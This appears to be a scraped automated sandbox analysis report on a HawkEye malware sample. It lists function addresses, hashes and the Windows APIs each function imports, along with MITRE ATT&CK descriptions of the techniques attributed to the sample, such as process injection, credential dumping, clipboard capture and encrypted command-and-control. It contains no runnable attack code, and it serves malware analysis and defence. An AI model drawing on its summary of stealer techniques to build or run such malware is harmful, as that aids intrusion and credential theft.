Opcode ID: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
Instruction ID: 99369b2f7b4a62638f95efb923bbf95607b210eae314fb40be60fbcdcdd136bc
Opcode Fuzzy Hash: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
Instruction Fuzzy Hash: 8E11E371200304BBEB11DF65CC05F5F7BA8AF91348F00407AF904AB391EA39DA20C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004089E1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00408A26
memcpy.MSVCRT ref: 00408A36

Strings

%2.2X , xrefs: 00408A1B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95

Uniqueness

Uniqueness Score: -1.00%

Function 004174E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
CloseHandle.KERNEL32(?), ref: 00417524

Strings

NA, xrefs: 00417503

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleUnmapView
String ID: NA
API String ID: 2381555830-2562218444
Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040D21F
_snwprintf.MSVCRT ref: 0040D23F

Strings

%%-%d.%ds , xrefs: 0040D214

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
Opcode Fuzzy Hash: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408907, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00408956
wcscpy.MSVCRT ref: 0040896D

Strings

X, xrefs: 0040893B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
Opcode Fuzzy Hash: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004018F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
memset.MSVCRT ref: 00401930

Strings

WinPos, xrefs: 00401943

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
Opcode Fuzzy Hash: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B93B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B94E
_itow.MSVCRT ref: 0040B95C

Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32 ref: 0040B90F

Strings

X1E, xrefs: 0040B93B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$PrivateProfileString_itow
String ID: X1E
API String ID: 1482724422-1560614071
Opcode ID: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
Instruction ID: c527bd8864a1e8dc9924cbacd4c6e7ae812da0d58d0774c54ed9ac8dc2116314
Opcode Fuzzy Hash: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
Instruction Fuzzy Hash: EDE0BFB294021CB6EF11BFA1CC46F9D77ACBB14748F004025FA05A51D1E7B8E6598759

Uniqueness

Uniqueness Score: -1.00%

Function 0042B269, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042B30B
memcpy.MSVCRT ref: 0042B344
memset.MSVCRT ref: 0042B35A
memcpy.MSVCRT ref: 0042B393

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
Instruction ID: 5583aac8f3c8c6829f169dedbb5c7f3bc80267d871db847419cec400d03eb5c0
Opcode Fuzzy Hash: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
Instruction Fuzzy Hash: A551B375A00215EBDF14DF55D882BAEBB75FF04340F54805AED04A6252E7789E50CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C05B, Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 004087CA: memset.MSVCRT ref: 004087D8

??2@YAPAXI@Z.MSVCRT ref: 0040C088
??2@YAPAXI@Z.MSVCRT ref: 0040C0AF
??2@YAPAXI@Z.MSVCRT ref: 0040C0D0
??2@YAPAXI@Z.MSVCRT ref: 0040C0F1

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
Instruction ID: 98264c0c01cbe32efcdb0ac77575e239005db210b2699cda7c9871cbaaee01ad
Opcode Fuzzy Hash: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
Instruction Fuzzy Hash: 4B21B5B0A11700CFD7518F6A8485A16FAE8FF95310B26C9AFD159DB6B2D7B8C440CF14

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report b15023b1855da1cf5213b061dc626cc2

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: HawkEye

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 00A31000, Relevance: 5.0, Strings: 4, Instructions: 37
COMMON

Function 00A318A3, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00A3A5E6, Relevance: 12.2, APIs: 8, Instructions: 222
COMMON

Function 00A380BE, Relevance: 3.2, APIs: 2, Instructions: 169
COMMON

Function 00A37D67, Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Function 00A34DC6, Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00A34CDB, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Function 00A3ADEE, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1412
COMMONCrypto

Function 00A31755, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
COMMON

Function 00A3511E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79
COMMON

Function 00A31643, Relevance: 6.1, APIs: 4, Instructions: 56
timethreadCOMMON

Function 00A34450, Relevance: 4.5, APIs: 3, Instructions: 21
COMMON

Function 00A3E86F, Relevance: 1.8, APIs: 1, Instructions: 272
COMMONCrypto

Function 00A319BB, Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Function 00A3781C, Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Function 00A38F0E, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 00A3A940, Relevance: .5, Instructions: 485
COMMONCrypto

Function 00A33107, Relevance: .2, Instructions: 223
COMMONCrypto

Function 00A39D26, Relevance: 7.7, APIs: 5, Instructions: 154
fileCOMMON

Function 00A389C8, Relevance: 7.6, APIs: 5, Instructions: 115
COMMON

Function 00A38370, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 00A322C3, Relevance: 6.1, APIs: 4, Instructions: 58
libraryCOMMON

Function 00A35453, Relevance: 6.1, APIs: 4, Instructions: 54
libraryCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre